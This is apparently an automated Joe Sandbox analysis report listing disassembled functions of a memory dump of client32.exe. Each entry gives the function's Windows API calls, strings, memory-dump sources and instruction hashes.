                                                                                                                                                                                • idata->n_connections=%d, xrefs: 1106964B
                                                                                                                                                                                • CloseTransports slept for %u ms, xrefs: 11069630
                                                                                                                                                                                • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                                                                                                                                • API String ID: 2285713701-3017572385
                                                                                                                                                                                • Opcode ID: c3f8a7cc431ed3d04cc4fa31f0e672fc3621072455ff40744cddb22728c0a876
                                                                                                                                                                                • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                                                                                                                                • Opcode Fuzzy Hash: c3f8a7cc431ed3d04cc4fa31f0e672fc3621072455ff40744cddb22728c0a876
                                                                                                                                                                                • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                                                                                                                                Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                                                                                                                                • GetStockObject.GDI32(00000007), ref: 11003089
                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 110030A7
                                                                                                                                                                                • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                                                                                                                • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 11003128
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1100312E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4121194973-0
                                                                                                                                                                                • Opcode ID: f56b5871e1fa357ac8c1c876b32cf72a9cb152693752db83982bbae816f38702
                                                                                                                                                                                • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                                                                                                                • Opcode Fuzzy Hash: f56b5871e1fa357ac8c1c876b32cf72a9cb152693752db83982bbae816f38702
                                                                                                                                                                                • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                                                                                                                Function 110832E0 Relevance: 18.1, APIs: 12, Instructions: 91COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 110832F5
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                • _free.LIBCMT ref: 1108330B
                                                                                                                                                                                • _free.LIBCMT ref: 1108331E
                                                                                                                                                                                • _free.LIBCMT ref: 11083331
                                                                                                                                                                                • _free.LIBCMT ref: 11083344
                                                                                                                                                                                • _free.LIBCMT ref: 1108335A
                                                                                                                                                                                • _free.LIBCMT ref: 11083370
                                                                                                                                                                                • _free.LIBCMT ref: 11083383
                                                                                                                                                                                • _free.LIBCMT ref: 11083399
                                                                                                                                                                                • _free.LIBCMT ref: 110833B2
                                                                                                                                                                                • _free.LIBCMT ref: 110833CB
                                                                                                                                                                                • _free.LIBCMT ref: 110833DA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: a1b586291005e9515c8070c446d40047bdc5e54b0c845c1fed74e759c2cdd400
                                                                                                                                                                                • Instruction ID: d73a07effb4f1cc2169240721e4037a9cebeab3da0ae14fe82c7562fe4c19817
                                                                                                                                                                                • Opcode Fuzzy Hash: a1b586291005e9515c8070c446d40047bdc5e54b0c845c1fed74e759c2cdd400
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F3173F2E08B015BF610CBA9988048BF7ED6FA0624B144D29E8CEC7710E672F551CB46
                                                                                                                                                                                Function 1113F710 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                                                                                                                                • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                                                                                                                                • GetPropA.USER32(?), ref: 1113F85D
                                                                                                                                                                                • wsprintfA.USER32 ref: 1113F88F
                                                                                                                                                                                • RemovePropA.USER32(?), ref: 1113F8C1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Prop$wsprintf$Exception@8RemoveThrowstd::exception::exception
                                                                                                                                                                                • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                                                • API String ID: 1630269101-1590351400
                                                                                                                                                                                • Opcode ID: a199186501cab72cb71f2e9fdd3ca48e9197946bb9498718a69113d068da591d
                                                                                                                                                                                • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                                                                                                                                • Opcode Fuzzy Hash: a199186501cab72cb71f2e9fdd3ca48e9197946bb9498718a69113d068da591d
                                                                                                                                                                                • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                                                                                                                                Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CountClipboardFormats.USER32 ref: 11033091
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 110331BF
                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                                                                                                                • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcesswsprintf
                                                                                                                                                                                • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                                                                                                                • API String ID: 3994740182-597690070
                                                                                                                                                                                • Opcode ID: 12076309b0e614659710253b56b10fba86b8d6edc19367b75c588a90eff7a1a6
                                                                                                                                                                                • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                                                                                                                • Opcode Fuzzy Hash: 12076309b0e614659710253b56b10fba86b8d6edc19367b75c588a90eff7a1a6
                                                                                                                                                                                • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                                                                                                                Function 11053590 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 162COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(111EE294,2520CF5D,408B018B,?,05685620,?,00000000,11181BDE), ref: 110535C4
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11053635
                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11053660
                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_freestd::_std::exception::exceptionwsprintf
                                                                                                                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                                                                                                                • API String ID: 4069305363-1197860701
                                                                                                                                                                                • Opcode ID: 2388c1fec9cdd846009fdd893aeafdd8c9f6c686aa480a14cbe3fd54bad85d3b
                                                                                                                                                                                • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                                                                                                                • Opcode Fuzzy Hash: 2388c1fec9cdd846009fdd893aeafdd8c9f6c686aa480a14cbe3fd54bad85d3b
                                                                                                                                                                                • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
                                                                                                                                                                                Function 11153730 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 11153763
                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 11153779
                                                                                                                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 1115385F
                                                                                                                                                                                • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 11153887
                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1115389B
                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 111538C1
                                                                                                                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 111538D1
                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 111538D8
                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 111538E7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                                                                                • String ID: (
                                                                                                                                                                                • API String ID: 602542589-3887548279
                                                                                                                                                                                • Opcode ID: 229d88ca0227b3392ba4bc213f6c952bdf415e29ce676bfcf7f1edae628f0850
                                                                                                                                                                                • Instruction ID: d520eb4ea94c146294e5bc27ee2bf9e491812ef3a8de5d3ff178baa6803be84b
                                                                                                                                                                                • Opcode Fuzzy Hash: 229d88ca0227b3392ba4bc213f6c952bdf415e29ce676bfcf7f1edae628f0850
                                                                                                                                                                                • Instruction Fuzzy Hash: 1751FAF5E102289FDB64DF29CD84799BBB8EF89304F4051E9E619E3240E6705E81CF68
                                                                                                                                                                                Function 1105D3B0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 94processsynchronizationCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 1105D3F6
                                                                                                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 1114580D
                                                                                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,11110200), ref: 1114584E
                                                                                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                                                • wsprintfA.USER32 ref: 1105D440
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1105D47A
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1105D491
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1105D49C
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1105D4A9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFolderHandlePathwsprintf$CreateFileModuleNameObjectProcessSingleWait
                                                                                                                                                                                • String ID: "%sclient32.exe" /thumb:%s$D$Winsta0\%s$creating @%s %s
                                                                                                                                                                                • API String ID: 1643118941-1321119703
                                                                                                                                                                                • Opcode ID: 9a078267b6740080f19795b7554362068ffc6aa457ad6a6d678bb4cf0e7d7ca3
                                                                                                                                                                                • Instruction ID: 06013d011853789e80bf7b97ba71dc97ddf139ff832a1c98a989e6f716475f2d
                                                                                                                                                                                • Opcode Fuzzy Hash: 9a078267b6740080f19795b7554362068ffc6aa457ad6a6d678bb4cf0e7d7ca3
                                                                                                                                                                                • Instruction Fuzzy Hash: 61316176E01228ABDB10DFA4DC88BDEB7B8EB48315F5045E9E50DA7140EB716E44CF90
                                                                                                                                                                                Function 110654E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 80COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000), ref: 11065525
                                                                                                                                                                                  • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                                                                                                                  • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 11065558
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
